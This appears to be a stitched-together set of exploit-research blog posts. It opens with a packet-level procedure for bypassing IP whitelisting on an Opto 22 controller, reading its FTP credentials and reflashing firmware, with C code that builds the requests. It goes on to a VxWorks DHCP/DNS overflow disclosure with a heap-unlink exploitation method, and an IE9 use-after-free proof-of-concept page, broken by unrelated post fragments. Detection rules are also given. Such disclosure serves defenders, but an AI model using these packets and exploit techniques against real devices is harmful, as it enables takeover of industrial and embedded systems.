The device can be configured with IP filtering whitelists and the FTP service can be disabled by setting its port number to zero. A whitelisted IP address can be discovered by sending an OptoMMP read request to the broadcast address from every IP address in a subnet looking for responses. This can only be done if the attacker is on the same network segment as the device.

The following packet hexdump shows the contents of the UDP packets used to discover a whitelisted IP address. The packets are sent to the IP broadcast address 255.255.255.255. The IP source address is different for each packet as it is scanned through a range of addresses. At the UDP layer the packets are sent to port 2001 and the source port is randomly chosen. The transaction label (the six high-order bits in the third byte) is also chosen randomly.

00 00 bc 50 00 00 ff ff f0 30 00 80 00 20 00 00

The reply to the read block request is unicast back to the source port and IP address of the request.

00000000 00 00 ec 70 00 00 00 00 00 00 00 00 00 20 00 00 ...p.... ..... ..
00000010 4f 50 54 4f 45 4d 55 2d 53 4e 52 2d 44 52 32 00 OPTOEMU- SNR-DR2.
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
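
The payload of a read block response can be extracted as follows. The layout used here is inferred from the hexdumps in this section rather than taken from the OptoMMP Protocol Guide: a 16-byte header, the transaction code in the high nibble of byte 3 (7 for a read block response), and a 16-bit big-endian data length in bytes 12 and 13. The function name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define OPTOMMP_HDR_LEN            16
#define TCODE_READ_BLOCK_RESPONSE  0x7   /* inferred from the dumps */

/* Return a pointer to the data carried by a read block response and
 * store its length in *out_len. Returns NULL if the packet is too short,
 * is not a read block response, or claims more data than it holds. */
const uint8_t *optommp_read_payload(const uint8_t *pkt, size_t pkt_len,
                                    size_t *out_len)
{
    if (pkt_len < OPTOMMP_HDR_LEN)
        return NULL;
    if ((pkt[3] >> 4) != TCODE_READ_BLOCK_RESPONSE)
        return NULL;
    size_t n = ((size_t)pkt[12] << 8) | pkt[13];
    if (n > pkt_len - OPTOMMP_HDR_LEN)
        return NULL;
    *out_len = n;
    return pkt + OPTOMMP_HDR_LEN;
}
```

For the response above, this yields 32 bytes beginning with the NUL-terminated string OPTOEMU-SNR-DR2.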

The FTP port is then set to 21 with a write block request to ensure that FTP is enabled. The response is ignored.

00000000 00 00 b8 10 00 00 ff ff f0 3a 00 10 00 04 00 00
00000010 00 00 00 15
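
The read and write block requests shown so far share one 16-byte header. The sketch below rebuilds both from their fields. The field positions are inferred from the hexdumps and from the description of the transaction label above (transaction code 5 for read block, 1 for write block, in the high nibble of byte 3; a 48-bit address in bytes 6 to 11; a 16-bit length in bytes 12 and 13). All function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TCODE_WRITE_BLOCK_REQUEST 0x1   /* inferred from the dumps */
#define TCODE_READ_BLOCK_REQUEST  0x5   /* inferred from the dumps */

/* Fill in the 16-byte request header shared by both request types. */
static void put_header(uint8_t *out, uint8_t tlabel, uint8_t tcode,
                       uint64_t addr, uint16_t length)
{
    memset(out, 0, 16);
    out[2] = (uint8_t)((tlabel & 0x3f) << 2);   /* six high-order bits */
    out[3] = (uint8_t)(tcode << 4);
    for (int i = 0; i < 6; i++)                 /* 48-bit big-endian address */
        out[6 + i] = (uint8_t)(addr >> (8 * (5 - i)));
    out[12] = (uint8_t)(length >> 8);
    out[13] = (uint8_t)length;
}

/* Build a read block request for length bytes at addr; always 16 bytes. */
size_t optommp_read_block(uint8_t out[16], uint8_t tlabel,
                          uint64_t addr, uint16_t length)
{
    put_header(out, tlabel, TCODE_READ_BLOCK_REQUEST, addr, length);
    return 16;
}

/* Build a write block request; returns 0 if out is too small. */
size_t optommp_write_block(uint8_t *out, size_t cap, uint8_t tlabel,
                           uint64_t addr, const void *data, uint16_t length)
{
    if (cap < 16u + length)
        return 0;
    put_header(out, tlabel, TCODE_WRITE_BLOCK_REQUEST, addr, length);
    memcpy(out + 16, data, length);
    return 16u + length;
}
```

With transaction label 0x2f, address 0xfffff0300080 and length 0x20, optommp_read_block reproduces the part-number read request; with label 0x2e, address 0xfffff03a0010 and the four data bytes 00 00 00 15, optommp_write_block reproduces the FTP port write.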

The ten IP filter mask values are all set to 0.0.0.0 with ten write block requests. The responses are ignored.

00000014 00 00 04 10 00 00 ff ff f0 3a 00 24 00 04 00 00
00000024 00 00 00 00
00000028 00 00 80 10 00 00 ff ff f0 3a 00 2c 00 04 00 00
00000038 00 00 00 00
0000003C 00 00 04 10 00 00 ff ff f0 3a 00 34 00 04 00 00
0000004C 00 00 00 00
00000050 00 00 14 10 00 00 ff ff f0 3a 00 3c 00 04 00 00
00000060 00 00 00 00
00000064 00 00 d8 10 00 00 ff ff f0 3a 00 44 00 04 00 00
00000074 00 00 00 00
00000078 00 00 c0 10 00 00 ff ff f0 3a 00 4c 00 04 00 00
00000088 00 00 00 00
0000008C 00 00 90 10 00 00 ff ff f0 3a 00 54 00 04 00 00
0000009C 00 00 00 00
000000A0 00 00 38 10 00 00 ff ff f0 3a 00 5c 00 04 00 00
000000B0 00 00 00 00
000000B4 00 00 a8 10 00 00 ff ff f0 3a 00 64 00 04 00 00
000000C4 00 00 00 00
000000C8 00 00 d8 10 00 00 ff ff f0 3a 00 6c 00 04 00 00
000000D8 00 00 00 00

The FTP username is obtained with a read block request:

00 00 08 50 00 00 ff ff f0 3d 00 00 00 40 00 00

In this example the configured FTP username is “admin”:

00000000 00 00 08 70 00 00 00 00 00 00 00 00 00 40 00 00 ...p.... .....@..
00000010 61 64 6d 69 6e 00 00 00 00 00 00 00 00 00 00 00 admin... ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........

The FTP password is also obtained with a read block request:

00 00 9c 50 00 00 ff ff f0 3d 00 40 00 40 00 00

In this example the configured FTP password is “exodus”:

00000000 00 00 9c 70 00 00 00 00 00 00 00 00 00 40 00 00 ...p.... .....@..
00000010 65 78 6f 64 75 73 00 00 00 00 00 00 00 00 00 00 exodus.. ........
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........

At this point the firmware can be upgraded using the FTP server on port 21.

Firmware

The firmware image is a raw image that is stored in flash memory which is mapped into the CPU’s address space at 0x60000000. The firmware has an ANSI CRC16 checksum stored as a big-endian 32-bit number at offset 0x3f8 into the file and the file size is stored as a big-endian 32-bit number at offset 0x3fc into the file.
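
The two header fields can be read with a pair of big-endian accessors, sketched below with hypothetical function names. The CRC routine is an assumption: "ANSI CRC16" is commonly taken to mean the reflected polynomial 0xA001 with a zero initial value (also called CRC-16/ARC), but the text does not state the exact parameters, nor which bytes of the image the checksum covers, so treat crc16_arc as a plausible candidate rather than the device's confirmed algorithm.

```c
#include <stddef.h>
#include <stdint.h>

#define FW_CRC_OFFSET   0x3f8
#define FW_SIZE_OFFSET  0x3fc

/* Read a 32-bit big-endian integer from p. */
static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Checksum and file size as stored in the image header.
 * img must be at least 0x400 bytes long. */
uint32_t fw_stored_crc(const uint8_t *img)  { return get_be32(img + FW_CRC_OFFSET); }
uint32_t fw_stored_size(const uint8_t *img) { return get_be32(img + FW_SIZE_OFFSET); }

/* CRC-16/ARC: reflected polynomial 0xA001, initial value 0, no final XOR.
 * ASSUMPTION: the device may use different parameters. */
uint16_t crc16_arc(const uint8_t *data, size_t len)
{
    uint16_t crc = 0;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc & 1) ? (uint16_t)((crc >> 1) ^ 0xA001) : (uint16_t)(crc >> 1);
    }
    return crc;
}
```

A quick sanity check for the CRC routine is the standard test string "123456789", for which CRC-16/ARC gives 0xBB3D.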

Flashing the Firmware

The firmware is uploaded over FTP to the device into the root directory. The command to program the firmware into flash memory is the string “Krn <filename>” uploaded as a file named “commandfile” over FTP. The result of the command can be read back by downloading the “commandfileresponse” file. The following is a transcript from the FTP control connection.

220 Opto 22 FTP server ready.
USER admin
331 Please specify the password.
PASS exodus
230 User logged in, proceed.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,250,245).
STOR payload
150 File status okay; about to open data connection.
226 Closing data connection.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,205,91).
STOR commandfile
150 File status okay; about to open data connection.
226 Closing data connection.
TYPE i
200 TYPE Command okay.
PASV
227 Entering Passive Mode (10,100,0,3,159,210).
RETR commandfileresponse
150 File status okay; about to open data connection.
226 Closing data connection.
221 Goodbye.

The device automatically reboots after successful programming.

This procedure leaves the networking configuration intact but clears other configuration and programming of the device.

Detection Guidance

Exploitation attempts can be detected by monitoring network traffic for unexpected FTP and OptoMMP traffic. Firmware upgrades should be rare and occur only during planned maintenance.
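
One way to narrow down "unexpected OptoMMP traffic" is to flag requests that touch the security fields listed earlier. The sketch below does this for packets sent to port 2001. The header layout (transaction code in the high nibble of byte 3, 48-bit address in bytes 6 to 11) is inferred from the hexdumps in this section, and the function name and address ranges chosen are our own assumptions.

```c
#include <stddef.h>
#include <stdint.h>

/* Read the 48-bit big-endian destination address from bytes 6..11. */
static uint64_t get_addr48(const uint8_t *pkt)
{
    uint64_t a = 0;
    for (int i = 0; i < 6; i++)
        a = (a << 8) | pkt[6 + i];
    return a;
}

/* Return 1 if the request writes the FTP port or IP filter fields, or
 * reads the FTP username or password; 0 otherwise. */
int optommp_touches_security(const uint8_t *pkt, size_t len)
{
    if (len < 16)
        return 0;
    uint8_t  tcode = pkt[3] >> 4;
    uint64_t addr  = get_addr48(pkt);

    /* write block request (tcode 1) into FTP port / IP filter area */
    if (tcode == 0x1 && addr >= 0xfffff03a0010ULL && addr <= 0xfffff03a006cULL)
        return 1;
    /* read block request (tcode 5) of FTP username or password */
    if (tcode == 0x5 && addr >= 0xfffff03d0000ULL && addr < 0xfffff03d0080ULL)
        return 1;
    return 0;
}
```

A read of the part number at 0xfffff0300080 is not flagged, since it reveals nothing sensitive by itself, although a burst of such reads from many source addresses matches the whitelist scan described above.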

VxWorks: Execute My Packets

Contributors

David Barksdale and Alex Wheeler

1. Background

Earlier this year we reported 3 vulnerabilities in VxWorks to Wind River. Each of these vulnerabilities can be exploited by anonymous remote attackers on the same network without user interaction to take control of the affected device. VxWorks is widely used in Aerospace and Defense, Automotive, Industrial, Medical, Consumer Electronics, Networking and Communication Infrastructure applications (https://en.wikipedia.org/wiki/VxWorks#Notable_uses).

2. Summary

As of this writing the flaws have not been assigned CVE numbers. They are:

  1. DHCP client heap overflow in handle_ip() affecting VxWorks 6.4 and prior
  2. DHCP server stack overflow in ipdhcps_negotiate_lease_time() affecting VxWorks 6.9 versions prior to 6.9.3.1, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5 and prior versions
  3. DNS client stack overflow in ipdnsc_decode_name() affecting VxWorks 7, VxWorks 6.9, VxWorks 6.8, VxWorks 6.7, VxWorks 6.6, and VxWorks 6.5

Please login to your support account on windriver.com or contact your Wind River support representative for mitigation of these issues.

3. Vulnerabilities

A. DHCP IP Address Option Client Heap Overflow

VxWorks 6.4 and prior fail to properly handle the lengths of IP addresses in DHCP Options in handle_ip() and handle_ips(). handle_ip() contains a trivial overflow and will be the focus of this section. The flaw was initially found while auditing the network stack of IN_DISCLOSURE. Below is the disassembly describing the flaw in handle_ip() from the IN_DISCLOSURE firmware.

RAM:803D6D38 handle_ip: # DATA XREF: RAM:80F18AC8o
RAM:803D6D38            # RAM:80F18B04o ...
RAM:803D6D38
RAM:803D6D38 addiu $sp, -0x28
RAM:803D6D3C sw    $s3, 0x28+var_C($sp)
RAM:803D6D40 sw    $s2, 0x28+var_10($sp)
RAM:803D6D44 sw    $s0, 0x28+var_18($sp)
RAM:803D6D48 sw    $ra, 0x28+var_8($sp)
RAM:803D6D4C sw    $s1, 0x28+var_14($sp)
RAM:803D6D50 move  $s3, $a0
RAM:803D6D54 lb    $s1, 0($s3)
RAM:803D6D58 move  $s2, $a1
RAM:803D6D5C li    $v0, 0x36
RAM:803D6D60 beq   $s1, $v0, __copy_option__ # code == 36h
RAM:803D6D64 addiu $s0, $s2, 0x98
RAM:803D6D68 li    $v0, 0x20
RAM:803D6D6C beq   $s1, $v0, __copy_option__ # code == 20h
RAM:803D6D70 addiu $s0, $s2, 0xB8
RAM:803D6D74 li    $a0, 1 # num
RAM:803D6D78 jal   my_calloc # 4 byte buffer
RAM:803D6D7C li    $a1, 4 # size
RAM:803D6D80 move  $s0, $v0
RAM:803D6D84 beqz  $s0, __exit__ # calloc() == ERROR
RAM:803D6D88 li    $v0, 0xFFFFFFFF
<...SNIP...>
RAM:803D6E28 __copy_option__: # CODE XREF: handle_ip+28j
RAM:803D6E28 lbu   $a2, 1($s3) # len (1 BYTE FROM PACKET)
RAM:803D6E2C move  $a1, $s0 # dst (4 BYTE BUFFER)
RAM:803D6E30 jal   my_bcopy
RAM:803D6E34 addiu $a0, $s3, 2 # src (OptionPtr + 2)
RAM:803D6E38 move  $v0, $zero
RAM:803D6E3C __exit__: # CODE XREF: handle_ip+4Cj
RAM:803D6E3C lw    $ra, 0x28+var_8($sp)
RAM:803D6E40 lw    $s3, 0x28+var_C($sp)
RAM:803D6E44 lw    $s2, 0x28+var_10($sp)
RAM:803D6E48 lw    $s1, 0x28+var_14($sp)
RAM:803D6E4C lw    $s0, 0x28+var_18($sp)
RAM:803D6E50 jr    $ra
RAM:803D6E54 addiu $sp, 0x28
RAM:803D6E54 # End of function handle_ip

As described in the disassembly above, the vulnerability is caused by using a DHCP option length from the packet to copy into a 4 byte heap buffer, resulting in a heap overflow. This vulnerability can be exploited by responding to an affected device’s DHCP request with a malicious response containing a DHCP option length larger than 4 for the following DHCP option codes: 1, 16, 28, 32, and 54.

B. DHCP Option Lease Time Negotiation Server Stack Overflow

VxWorks 6.5 through VxWorks 6.9.3 fail to properly validate a lease time length when a DHCP server parses DHCP option 51 in ipdhcps_negotiate_lease_time(), which results in a stack overflow. The flaw is caused by using the length of the DHCP IP Address Lease Time option from the packet to copy into a 4 byte stack buffer. In either a DHCP Discover or Request packet, the attacker simply includes an option of type 51 (the lease time option) that is larger than the expected 4 bytes. The entire contents of the option record (up to 255 bytes) will be copied into a buffer on the stack that is only 4 bytes.

C. DNS Response Decompression Stack Overflow

VxWorks 6.5 through VxWorks 7 fail to properly bound the decompression of names in ipdnsc_decode_name() which results in a stack overflow. The following is a snippet of the affected code for your review.

IP_STATIC Ip_s32
ipdnsc_decode_name(Ip_u8 *name, Ip_u8 *buf, Ip_u8 *start, Ip_u8 *end)
{
  Ip_u8 *ptr, *prev;
  Ip_s32 i, len, tot_len = 0, compress = 0;

  ptr = buf;
  while (*ptr && ptr < end)
  {
    /* Loop until we find a non-pointer */
    while ((*ptr & 0xc0) == 0xc0 && ptr < end)
    {
      prev = ptr;
      ptr = start + (IP_GET_NTOHS(ptr) & 0x3fff);
      if (ptr >= prev)
        return -1; /* Do not allow forward jumps (avoid loops) */
      if (!compress)
        tot_len += 2;
      compress = 1;
    }
    /* Store the length of the label */
    if (ptr >= end)
      return -1;
    len = *ptr++;
    if (len > IPDNSC_MAXLABEL)
      return -1;
    if (!compress) 
      tot_len = tot_len + len + 1;
    if (tot_len > IPDNSC_MAXNAME)
      return -1;
    /* Copy the label to name */
    for (i=0; i<len; i++)
    {
      if (ptr >= end)
        return -1;
      *name++ = *ptr++;
    }
    *name++ = '.';
  }

  if (!compress)/* Increment for the last zero */
    tot_len++;

  /* Null terminate the name string */
  if (tot_len)
    name--;
  *name = 0;
  return tot_len;
}

In the above code, the programmer fails to properly bound the decoded name to IPDNSC_MAXNAME when decompression is involved: once a compression pointer has been followed, tot_len is no longer incremented, so the length check never fires again. The only caller of this function, ipdnsc_parse_response(), passes the address of a 255-byte stack buffer as the output buffer name. When an attacker causes the target to process a DNS response with a name record that decompresses to more than 255 bytes, the stack buffer will be overflowed.
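To make the missing bound concrete, here is a small Python model of the loop above. It is a sketch under assumptions: IPDNSC_MAXLABEL and IPDNSC_MAXNAME are taken to be 63 and 255, start is taken to be offset 0 of the message, and the output buffer is modelled as a growable bytearray so we can simply measure how much would have been written.

```python
IPDNSC_MAXLABEL = 63   # assumed value
IPDNSC_MAXNAME = 255   # assumed value


def decode_name(msg: bytes, pos: int):
    """Model of ipdnsc_decode_name(); returns (tot_len, bytes written)."""
    out = bytearray()
    tot_len, compress, ptr, end = 0, False, pos, len(msg)
    while ptr < end and msg[ptr] != 0:
        # Follow compression pointers (backward jumps only).
        while ptr < end and (msg[ptr] & 0xC0) == 0xC0:
            prev = ptr
            ptr = int.from_bytes(msg[ptr:ptr + 2], "big") & 0x3FFF
            if ptr >= prev:
                return -1, bytes(out)
            if not compress:
                tot_len += 2
            compress = True
        if ptr >= end:
            return -1, bytes(out)
        length = msg[ptr]
        ptr += 1
        if length > IPDNSC_MAXLABEL:
            return -1, bytes(out)
        if not compress:          # the bug: no accounting after a pointer
            tot_len += length + 1
        if tot_len > IPDNSC_MAXNAME:
            return -1, bytes(out)
        for _ in range(length):
            if ptr >= end:
                return -1, bytes(out)
            out.append(msg[ptr])
            ptr += 1
        out.append(ord("."))
    if not compress:
        tot_len += 1
    if tot_len:
        out.pop()                 # models name-- before the terminator
    return tot_len, bytes(out)


# Six 63-byte labels at offset 0, then a name that is just a pointer to them.
labels = b"".join(bytes([63]) + b"a" * 63 for _ in range(6)) + b"\x00"
message = labels + b"\xc0\x00"
tot_len, written = decode_name(message, len(labels))
```

In this model the call reports a tot_len of 2 while 383 bytes have been produced, which is the mismatch that overruns the caller's 255-byte buffer.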

4. Exploitation

Attack Vectors

All 3 vulnerabilities may be exploited by anonymous remote attackers on the same network as the target. Since the DHCP vulnerabilities are reachable over UDP and we found no TTL enforcement, in theory, an anonymous remote attacker may be able to exploit them while not on the same network by spoofing packets. Non-local network exploitation seems more plausible against the DHCP Option IP Lease Time Server Stack Overflow than the DHCP Option IP Client Heap Overflow – mainly because you need to guess the client’s 2 byte Transaction ID to trigger the client overflow (spoof, spray, and pray). The DNS Decompression Stack Overflow may be exploited by attackers that are on the same network, in control of a name server, or MITM between the target and a legit name server.

The remainder of this post discusses exploitation of the DHCP IP Option Client Heap Overflow. The stack overflows are left as an exercise for the reader.

Exploiting the Heap Overflow in handle_ip()

The DHCP client heap overflow occurs when parsing option records in the DHCP Offer packet normally sent to clients from a DHCP server during start-up and periodically afterwards. DHCP option records which correspond to IP address values (types 1, 16, 28, 32, and 54) are assumed to have a length of four bytes, and the function which processes these options (named handle_ip) allocates a 4-byte buffer on the heap. However, when copying the contents of the option record into the buffer, the function uses the length value in the option record for the number of bytes to copy. An attacker can provide up to 255 bytes to copy into the 4-byte heap buffer.

While we weren’t able to test all affected versions on all platforms, we were able to develop an exploit for two IP Deskphones from two different vendors both running VxWorks 5.5 on MIPS32.

In broad strokes our exploit needs to corrupt heap metadata in such a way that gives us control of execution, then it needs to flush our exploit code from the data cache to main memory (MIPS has separate data and instruction caches) so it can be executed, then it needs to jump to that code. The exploit code then needs to repair the heap and for convenience start an OS task that executes whatever payload we may have.

The heap allocator maintains a doubly-linked list of free chunks which it scans when allocating memory. The previous and next pointers are stored in the chunk header along with the size of the chunk, a flag indicating if the chunk is free or allocated, and a pointer to the previous chunk in memory.

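   +----------------+------------+------------+
   | Previous Chunk | Free Chunk | Next Chunk |
   +----------------+------------+------------+

   Free chunk layout:

   +-----------------------------+
   | Previous chunk pointer      |
   +-----------------------------+
   | Chunk size and free flag    |
   +-----------------------------+
   | Next free chunk pointer     |
   +-----------------------------+
   | Previous free chunk pointer |
   +-----------------------------+
   | Data                        |
   +-----------------------------+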

Our exploit overwrites the previous and next pointers of a free chunk and then allocates that chunk. During allocation the free chunk is removed from the doubly-linked list, giving us the ability to write an arbitrary 4-byte value to an arbitrary location in memory. In order to get control of execution we overwrite the function pointer in the table of DHCP option handling functions for option type 48, then cause that function to be called by adding an option of that type to our DHCP Offer packet.
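The write primitive comes from the ordinary doubly-linked list removal. The Python model below is a sketch of that generic unlink step only: the field offsets and addresses are hypothetical and do not describe the actual VxWorks allocator.

```python
# Hypothetical offsets of the list pointers inside a free-list node.
NEXT_OFF = 0
PREV_OFF = 4


class Memory:
    """Sparse model of 32-bit words, keyed by address."""

    def __init__(self):
        self.words = {}

    def read(self, addr):
        return self.words.get(addr, 0)

    def write(self, addr, value):
        self.words[addr] = value & 0xFFFFFFFF


def unlink(mem, node):
    """Remove node from the list without validating its pointers."""
    nxt = mem.read(node + NEXT_OFF)
    prv = mem.read(node + PREV_OFF)
    mem.write(prv + NEXT_OFF, nxt)   # prev->next = next
    mem.write(nxt + PREV_OFF, prv)   # next->prev = prev


mem = Memory()
node, target, value = 0x1000, 0x2000, 0x3000
# The overflow has replaced the node's pointers with chosen values.
mem.write(node + NEXT_OFF, value)
mem.write(node + PREV_OFF, target - NEXT_OFF)
unlink(mem, node)
```

After the unlink, the word at target holds value. Note the mirrored second write, which stores target at value + PREV_OFF; in this model the chosen value therefore has to point at memory that can tolerate being written.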

To accomplish this we need to arrange the heap so that our buffer is adjacent to a free heap chunk of a known size, overflow that chunk’s header, and then allocate that chunk. This turns out to be easier than it sounds. The following DHCP option list does the job in most cases:

    Code   Len
   +-----+-----+
   |  3  |  0  |
   +-----+-----+
   |  4  |  0  |
   +-----+-----+
   \\    \\    \\
   +-----+-----+
   | 11  |  0  |
   +-----+-----+
   |  1  |  0  |
   +-----+-----+---\\---+
   |  1  | 32  |  Data  |
   +-----+-----+---\\---+
   | 28  | ... |
   +-----+-----+
   | 48  | ... |
   +-----+-----+

Option codes 3-11 each cause two small allocations from the heap. This helps defragment the heap and makes it more likely that the next chunk on the free list is large enough for our next two allocations. Assuming the next free chunk is large enough, the heap allocator will split it into two smaller chunks and return the one at the end for our first option 1. When handle_ip() processes the second option 1 record, it will allocate the heap buffer (which will be before and adjacent to the one we just allocated), notice that a buffer for option 1 was already allocated and free it (adding it to the head of the free list), then write our 32 bytes of data into the buffer, which overflows into the metadata of the first free chunk on the free list. Option 28 then allocates that corrupt chunk and in doing so overwrites the function pointer for handling option 48. Option 48 then calls that pointer and we have control of execution.

We will post more details about exploitation of this issue in the near future, after IN_DISCLOSURE have had a chance to publish a fix. If you have a VxWorks-based device and would like us to develop a PoC for it, please contact info@exodusintel.com with the details.

5. Detection

A. DHCP Option IP Address Client Heap Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Codes 1, 16, 28, 32, and 54 for values greater than 4 in DHCP Offers.

B. DHCP Option Lease Time Server Stack Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining the length field of DHCP Option Code 51 for values greater than 4 in DHCP Discover and Request packets.
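Both DHCP checks above amount to walking the option list and comparing length bytes. The following Python sketch shows one way to do that; the function and constant names are ours, and it assumes the caller has already located the options field (the bytes following the DHCP magic cookie). It does not handle options carried in the sname/file fields via option overload.

```python
CLIENT_IP_OPTIONS = frozenset({1, 16, 28, 32, 54})   # check in Offers
SERVER_LEASE_OPTIONS = frozenset({51})               # check in Discover/Request


def oversized_options(options: bytes, watched, max_len=4):
    """Return (code, length) for each watched option longer than max_len."""
    hits = []
    i = 0
    while i < len(options):
        code = options[i]
        if code == 0:            # pad option: single byte, no length
            i += 1
            continue
        if code == 255:          # end option
            break
        if i + 1 >= len(options):
            break                # truncated record, no length byte
        length = options[i + 1]
        if code in watched and length > max_len:
            hits.append((code, length))
        i += 2 + length
    return hits


offer = bytes([53, 1, 2, 1, 4, 255, 255, 255, 0, 1, 32]) + b"A" * 32 + bytes([255])
discover = bytes([53, 1, 1, 51, 8]) + bytes(8) + bytes([255])
```

Here oversized_options(offer, CLIENT_IP_OPTIONS) flags the second option 1 record, and oversized_options(discover, SERVER_LEASE_OPTIONS) flags the 8-byte lease time.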

C. DNS Response Decompression Stack Overflow

Detection of attempts to exploit this vulnerability can be accomplished by examining names in DNS responses for compression that results in a decoding of a name to larger than 255 bytes.
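A detector for this case has to decompress names itself, with its own bounds. The sketch below is one possible approach in Python; the names and the hop limit are our choices, and the length it computes is the dotted text length (each label plus one separator), which is what ends up in the 255-byte buffer.

```python
def decoded_name_length(msg: bytes, pos: int, max_hops: int = 128) -> int:
    """Length of the decompressed name starting at pos, in bytes."""
    total = 0
    hops = 0
    while True:
        if pos >= len(msg):
            raise ValueError("name runs past end of message")
        b = msg[pos]
        if b == 0:
            return total
        if (b & 0xC0) == 0xC0:                 # compression pointer
            if pos + 1 >= len(msg):
                raise ValueError("truncated pointer")
            pos = ((b & 0x3F) << 8) | msg[pos + 1]
            hops += 1
            if hops > max_hops:
                raise ValueError("too many compression pointers")
            continue
        if b & 0xC0:
            raise ValueError("reserved label type")
        if pos + 1 + b > len(msg):
            raise ValueError("truncated label")
        total += b + 1                         # label plus separator
        pos += 1 + b


def is_suspicious(msg: bytes, pos: int, limit: int = 255) -> bool:
    """True if the name at pos decompresses to more than limit bytes."""
    return decoded_name_length(msg, pos) > limit
```

Unlike the vulnerable routine, the count here keeps growing after a pointer has been followed, so a short pointer to a long run of labels is still measured in full.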

Exodus Intelligence 2016 Training Course

Vulnerability Development Master Class

Since our inception, Exodus Intelligence has provided training courses on a variety of advanced subjects which have consistently been filled with students from around the world. Over the last few years, we’ve hosted Master Classes in the USA, Asia, and Europe–both publicly and privately (by request).

Once again, our flagship course–the Vulnerability Development Master Class–returns with new content, taught by recognized experts. Known as some of the best in the industry, Exodus instructors are armed with real-world experience, as well as multiple Pwn2Own victories and PWNIE awards.

Execute My Packet

Contributors

David Barksdale, Jordan Gruskovnjak, and Alex Wheeler

1. Background

Cisco has issued a fix to address CVE-2016-1287. The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server. It is advertised as “the industry’s most deployed stateful firewall.” When deployed as a VPN, the device is accessible from the Internet and provides access to a company’s internal networks.

Silver Bullets and Fairy Tails

Introduction

This week we made mention on Twitter of a zero-day vulnerability we’ve unearthed that affects the popular Tails operating system. As the Tails website states:

“Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
use the Internet anonymously and circumvent censorship;
all connections to the Internet are forced to go through the Tor network;
leave no trace on the computer you are using unless you ask it explicitly;
use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.”

This software was largely popularized due to the fact that it was used by whistleblower Edward Snowden. Since then, the OS has garnered much attention and use by a wide range of those seeking anonymity on the Internet.

A browser is only as strong as its weakest byte – Part 2

As promised, the follow up from our previous post.

Before Thanksgiving, we left off with IE9 coughing up bytes. We’ll poke it some more today and make it do a little dance for us.
Last week we managed to trick IE9 into doing an INC[ADDRESS] for us where we could specify the address. Now it is time to see how much damage we can do with just that. Since we’ll operate under the assumption that everything in the process is ASLR’d, the first thing to do is come up with a way to predict a fixed address we can safely increment. The easiest way to do that will be using an aligned heapspray. In case you’re not familiar with heapspraying, especially heap spraying in Internet Explorer, below is a quick breakdown of the basics of a heapspray.

A browser is only as strong as its weakest byte

Back in September, FireEye posted a blog entry discussing CVE-2013-3147, a vulnerability in Microsoft Internet Explorer. They pointed out that Microsoft patched the issue on July 9th in Bulletin MS13-055. While reading their post it dawned on me that I had discovered a similar issue as far back as January this year. The usage of the onbeforeeditfocus event was what caught my attention, and upon installing the aforementioned patch from Microsoft, I confirmed that they silently fixed my bug, too. As we at Exodus had been shipping an exploit to our customers for this issue since January, we figured an adequate amount of time has passed and we can now share some details here on our blog.

The vulnerability we discovered was also a use-after-free vulnerability (as is often the case with browser issues) that involved event handlers and some other miscellaneous JavaScript constructs. The exploit I wrote bypassed ASLR through a forced memory disclosure and Data Execution Prevention through the usual ROP chain trickery. The actual exploit is non-trivial, so bear with me and expect some minimal shortcuts to be taken in the following explanation.

The Crash

First of all, let's dump a PoC that causes the crash:

<!doctype html>
<HTML>
  <head>
    <script>
      function setinput() {
        try { document.write('Timber'); } catch(e) {}
      }
      function loaded() {
        document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
        document.getElementsByTagName('input')[0].focus();
      }
    </script>
  </head>
  <body onload="loaded();">
    <input value="mydata" type="text"></input>
  </body>
</html>

If you open this file in Internet Explorer 9 (from a website, not as a local file) you might get a crash that looks like this:

This exception may be expected and handled.
eax=00000001 ebx=00000000 ecx=00000010 edx=0000006a esi=00000000 edi=00000000
eip=71e0e0d0 esp=0327cb8c ebp=0327cb98 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CHTMLEditor::FireOnSelectionChange+0xb:
71e0e0d0 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000010=????????
1:019> ub
MSHTML!CSelectionManager::EndSelectionChange+0x8e:
71e0e0c4 90              nop
MSHTML!CHTMLEditor::FireOnSelectionChange:
71e0e0c5 8bff            mov     edi,edi
71e0e0c7 55              push    ebp
71e0e0c8 8bec            mov     ebp,esp
71e0e0ca 51              push    ecx
71e0e0cb 51              push    ecx
71e0e0cc 53              push    ebx
71e0e0cd 8d4f10          lea     ecx,[edi+10h]

This might look like a NULL-pointer dereference: edi == NULL; ecx gets set to edi + 0x10; and then ecx is dereferenced. Since, as far as I know, NULL-pointer dereference vulnerabilities are not exploitable in Internet Explorer, this does not look useful. But this is not the actual crash, and to see where things first go wrong we simply turn on pageheap and the user mode stack trace database for iexplore.exe.

gflags.exe /i iexplore.exe +hpa +ust
